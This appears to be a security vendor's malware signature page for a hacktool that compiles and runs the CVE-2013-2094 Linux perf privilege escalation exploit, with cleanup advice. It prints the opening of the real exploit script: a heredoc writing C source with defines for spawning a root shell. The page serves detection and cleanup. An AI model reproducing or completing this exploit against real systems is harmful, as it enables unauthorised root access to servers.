Malware Signatures

  1. Home
  2. Malware Signatures
  3. sh.hacktool.abacus-exploit.001

sh.hacktool.abacus-exploit.001

Hacktools are specially crafted tools to perform malicious or illicit activities, such as controlling botnets, mining bitcoins, triggering Denial-of-Service attacks and bruteforcing passwords. Those tools most of the time hidden in the filesystem and were installed among with other malicious code throug a vulnerability or an already compromised server.
This tool complies and executes the abacus-exploit, also known as the Linux PERF privilege escalation exploit (CVE 2013-2094).

Affecting

Any vulnerable based website with shell support (mostly Linux boxes). Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your server looking for any unknown shell script file and remove them. Also, you can sign up with us and let our team remove the malware for you.

Dump

#!/bin/sh
# original exploit by sd@fucksheep.org, written in 2010
# heavily modified by spender to do things and stuff
# edited by Pashkela for RDOT.ORG 02.06.2013
cat > exp_abacus.c <<_EOF
/*
 * original exploit by sd@fucksheep.org, written in 2010
 * heavily modified by spender to do things and stuff
 */
#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <sys/utsname.h>
#include <fcntl.h>
#include <assert.h>
#define BIT64   (sizeof(unsigned long) != sizeof(unsigned int))
#define STRAIGHT_UP_EXECUTION_AT_NULL 0x31337
 /* for overflows */
#define EXIT_KERNEL_TO_NULL 0x31336
#define EXECUTE_AT_NONZERO_OFFSET 0xfffff000 // OR the offset with this
/* defines for post_exploit */
#define RUN_ROOTSHELL 0x5150
#define CHMOD_SHELL 0x5151
#define FUNNY_PIC_AND_ROOTSHELL 0xdeadc01d